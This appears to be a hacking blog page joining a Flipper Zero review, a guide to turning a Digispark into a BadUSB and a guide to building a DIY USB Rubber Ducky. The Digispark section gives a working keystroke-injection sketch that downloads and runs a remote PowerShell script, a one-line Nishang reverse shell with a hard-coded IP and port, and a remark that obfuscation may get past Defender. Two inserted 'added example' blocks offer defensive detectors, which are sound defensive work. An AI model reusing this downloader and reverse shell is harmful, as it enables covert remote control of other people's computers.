I love this device and can’t wait to test out more of its functionality. I definitely need to get the Wi-Fi development breakout board to do some Wi-Fi shenanigans, but so far I’ve had a lot of fun with it. Unfortunately, I couldn’t get it to work with my car’s central locking. While the device reads the signal fine, sending it to the car does nothing. I suspect this has something to do with the rolling key security mechanism built into car keys, but I digress. Anyway, this was a quick review of the Flipper Zero, so far so awesome. I can’t wait to experiment with the massive amount of features. I have barely scratched the surface.

Hack Any Computer In 2 Seconds With This £2 Device | Digispark

Hello World and welcome to HaXeZ. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title, but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too, but arguably faster. So, if you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.
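That "breakneck speed" is also the easiest thing for a defender to notice: a Digispark, a Flipper Zero in BadUSB mode or a Rubber Ducky types far faster and far more evenly than a person ever does. The following is an added example, not code from this post or from the Digispark or Hak5 projects: a keystroke-cadence heuristic that slides a window over key-event timestamps and flags runs that are both too fast and too regular to be human. The timing data is constructed for the demonstration, and the 20 ms / 10 ms thresholds and the window size are assumed tuning values, not measured ones.

```python
"""Added example (not from the original post or the Digispark/Hak5 projects):
a keystroke-cadence heuristic for spotting scripted HID input.
Thresholds and the sample timing data are assumptions constructed for illustration."""
from statistics import mean, pstdev
from typing import List, Tuple


def inter_key_gaps(timestamps: List[float]) -> List[float]:
    """Seconds between successive key-down events."""
    return [later - earlier for earlier, later in zip(timestamps, timestamps[1:])]


def find_injection_bursts(timestamps: List[float], window: int = 8,
                          max_mean_gap: float = 0.02,
                          max_jitter: float = 0.01) -> List[Tuple[int, int]]:
    """Slide a window over the key events and flag runs whose gaps are both
    faster (mean) and more uniform (standard deviation) than a human typist.
    Returns merged (first_event_index, last_event_index) ranges.
    The 20 ms / 10 ms thresholds are assumed values, not measured ones."""
    gaps = inter_key_gaps(timestamps)
    flagged = []
    for start in range(len(gaps) - window + 1):
        chunk = gaps[start:start + window]
        if mean(chunk) < max_mean_gap and pstdev(chunk) < max_jitter:
            flagged.append((start, start + window))
    # Merge overlapping windows into one burst per run of scripted keys.
    merged: List[Tuple[int, int]] = []
    for first, last in flagged:
        if merged and first <= merged[-1][1]:
            merged[-1] = (merged[-1][0], max(merged[-1][1], last))
        else:
            merged.append((first, last))
    return merged


def constructed_event_stream() -> List[float]:
    """Constructed timestamps: a person typing, then a 30-key scripted burst
    at ~5 ms per key, then the person again. Not captured from a real host."""
    human_before = [0.18, 0.22, 0.31, 0.15, 0.27, 0.40, 0.19, 0.24, 0.33, 0.21]
    human_after = [0.25, 0.19, 0.30, 0.22]
    stream, clock = [], 0.0
    for gap in human_before + [0.005] * 30 + human_after:
        clock += gap
        stream.append(clock)
    return stream


if __name__ == "__main__":
    events = constructed_event_stream()
    for first, last in find_injection_bursts(events):
        print(f"scripted-looking burst: events {first}..{last} "
              f"({events[last] - events[first]:.3f} s for {last - first} keys)")
```

The same idea is what lets a host agent react to a newly attached keyboard before the payload finishes: the first few keys of a 500 ms-delayed script look nothing like the human cadence recorded before the device was inserted.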

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Arduino Integrated Development Environment

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json

Digispark Additional Boards Manager URLS

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Arduino Boards Manager

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases 
Digispark Drivers

Digispark Payloads

Now that your Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a Fork Bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts
Digispark Payloads

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the Powershell reverse shell payload. You can see from the script below that this is a fairly simple script. It starts by sending the Windows Key and R to the computer. This opens the Run dialog box. After a brief delay, it types out “powershell.exe” into the Run dialog box and then sends the Enter key. This spawns a new Powershell window. In the new Powershell Window, it types out a command to download another payload from a URL. After a brief delay, it then executes the payload.

// This script downloads and executes a PowerShell script, effectively opening up a reverse shell in less than 3 seconds.
// Credits to hak5 and samratashok (developer of the nishang framework).

#include "DigiKeyboard.h"
void setup() {
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);                      // empty report so the host finishes enumerating the keyboard
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);    // Win+R opens the Run dialog
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);              // spawns a new PowerShell window
  DigiKeyboard.delay(500);
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /* Stops the Digispark from running the script again */
  }
}

Powershell Reverse Shell Payload

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it may not be detected. I won’t be attempting to do that in this walkthrough. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify. This script will need to be uploaded to a server that you control and then the location of the script needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
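From the blue-team side, the downloader sketch above leaves a very recognisable trace: an Invoke-WebRequest with -OutFile followed, seconds later, by execution of that same file, all typed into an interactive PowerShell session (which is exactly the text PowerShell script block logging, event ID 4104, records). The following is an added example, not code from this post or from the Nishang project: a small detector that correlates the download and the execution per host inside a time window. The log records are constructed to mimic script block text, example.invalid is a placeholder host, and the 60 s window is an assumed tuning value.

```python
"""Added example (not from the original post or the Nishang project): flag the
download-then-execute pattern in PowerShell script block log text. The sample
records below are constructed; they only mimic what script block logging
(event 4104) captures, and example.invalid is a placeholder host."""
import re
from datetime import datetime, timedelta
from typing import Iterable, List, Tuple

# Invoke-WebRequest ... -OutFile <path>; tolerant of quoting and parameter order.
OUTFILE_RE = re.compile(r"Invoke-WebRequest\b.*?-OutFile\s+['\"]?([^'\"\s]+)",
                        re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, accepting both / and \\ separators."""
    return re.split(r"[\\/]", path)[-1]


def find_download_then_run(records: Iterable[Tuple[str, str, str]],
                           window_seconds: int = 60) -> List[Tuple[str, str, str, str]]:
    """records: (iso_timestamp, host, script_text). Returns
    (host, downloaded_path, download_time, run_time) for every file fetched with
    -OutFile and then referenced in a later script block on the same host within
    the window. The 60 s window is an assumed tuning value."""
    pending = {}   # (host, basename) -> (download_time, full_path)
    hits = []
    for ts, host, text in sorted(records, key=lambda r: r[0]):
        now = datetime.fromisoformat(ts)
        match = OUTFILE_RE.search(text)
        if match:
            path = match.group(1)
            pending[(host, basename(path))] = (now, path)
            continue
        for key, (then, path) in list(pending.items()):
            same_host, name = key
            if same_host == host and name.lower() in text.lower() \
                    and now - then <= timedelta(seconds=window_seconds):
                hits.append((host, path, then.isoformat(), now.isoformat()))
                del pending[key]
    return hits


SAMPLE_RECORDS = [  # constructed, not real telemetry
    ("2024-05-01T09:12:01", "WS01",
     "Invoke-WebRequest -Uri 'https://example.invalid/payload.ps1' -OutFile 'payload.ps1'"),
    ("2024-05-01T09:12:02", "WS01", "./payload.ps1"),
    ("2024-05-01T09:30:00", "WS02", "Get-Process | Sort-Object CPU -Descending"),
    ("2024-05-01T11:00:00", "WS03",
     "Invoke-WebRequest -Uri 'https://example.invalid/report.csv' -OutFile 'C:\\Temp\\report.csv'"),
    ("2024-05-01T11:45:00", "WS03", "Import-Csv C:\\Temp\\report.csv"),  # 45 min later: outside the window
]

if __name__ == "__main__":
    for hit in find_download_then_run(SAMPLE_RECORDS):
        print("download-then-execute:", hit)
```

Only the WS01 pair is reported with the default window; the WS03 records show why the time bound matters, since a legitimate download that is opened an hour later is a normal workflow, not the half-second chain the sketch produces.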

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plug in the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

Upload Payload To Digispark

Digispark Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell payload to your web server and that the path has been amended in your downloader payload. Then set up a netcat listener or some other listener on your attack machine (the machine you want to connect back to) and plug the Digispark into the target machine. As mentioned previously, this will likely only work with Defender disabled unless you have modified your payload. However, please see the video below for a demonstration.

PwnHub Digispark Demonstration

Conclusions

The Digispark is a fantastic affordable device that has a lot of flexibility. The price alone is enough to justify owning one and tinkering with it. Granted the introduction about it being able to hack a computer in 2 seconds is a bit of an exaggeration but I hope you can see the potential from the write-up. You can use it for automation rather than hacking. You can tell it to do anything a keyboard can do provided the payload fits on the 6000kb chip. I had a lot of fun with it and will be keeping a few preconfigured ones in my hack bag at all times… just in case. Anyway, check out the video below for a more hands-on demonstration.

DIY USB Rubber Ducky

The pen…drive is mightier than the sword. The rubber ducky, first conceptualised and popularised by Darren Kitchen from hak5 is a USB keyboard emulator. It gives the wielder of this device unlimited power, at least on computer systems. The emulator injects keystrokes into the victim’s machine with unprecedented speed and precision. The right combination of keystrokes will do great but unspeakable things.

The USB rubber ducky https://shop.hak5.org/products/usb-rubber-ducky-deluxe currently sells for $49.99 which is a reasonable price and I would highly recommend purchasing one to support Hak5. However, if for some reason you are unable to get hold of one then pick yourself up a CJMCU virtual keyboard. You will also need a micro SD card, a micro SD card reader, a rubber duck and a coffee.

Installing the Arduino Integrated Development Environment

Once you have your coffee and your CJMCU you will need to download and install the Arduino integrated development environment. This can be downloaded from the Microsoft Store if you are using Windows, or you can get it from their website if you are using Linux. https://www.arduino.cc/en/guide/linux

Next you will need to get Duckduino from Seytonic’s GitHub repository.

Uploading the .ino Script

The next thing to do is insert your CJMCU into a USB port and launch the Arduino IDE. Before going any further, you may need to check that the right board and COM port are selected. Both of these can be configured from the Tools menu. Since the CJMCU board is a clone of the Leonardo board, that’s the board I selected from the boards menu.

Next you will need to copy the contents of the Duckduino-microSD.ino file into the Arduino sketch. Then use the upload button to push the new sketch to the CJMCU board. This is the functionality that allows the CJMCU to impersonate a keyboard. This is what allows it to act like the USB Rubber Ducky we all know and love. After a bit of time the upload will complete, and the device is almost ready to go. The only thing missing is a payload.

Loading the Payload

There is a huge repository of ducky payloads on the GitHub repository https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Find the payload you want; I suggest starting with something easy like the Open Webpage, Any Platform payload. Copy the contents of the script to a text file and make the modifications to tailor it to your liking (may I suggest https://www.youtube.com/watch?v=oHg5SJYRHA0). Save it as script.txt, or whatever you have set the String DEFAULT_FILE_NAME = "script.txt"; value to in the .ino file uploaded to the CJMCU. Finally, copy the script.txt file over to your microSD card using your microSD card reader. Your knock-off USB Rubber Ducky is now ready to prank unsuspecting victims.

While the USB Rubber Ducky is primarily associated with hacking and penetration testing, it is a powerful automation tool that can be used for a wide range of tedious tasks. For instance, imagine if you needed to install software or make configuration changes on multiple air gapped machines. You could write a script that automates this process for you.

While you’re here why not check out some of my other articles. I am currently going through the Starting Point on Hack The Box and have write-ups for Archetype, Oopsie, Vaccine, Shield, Pathfinder, Included and Markup.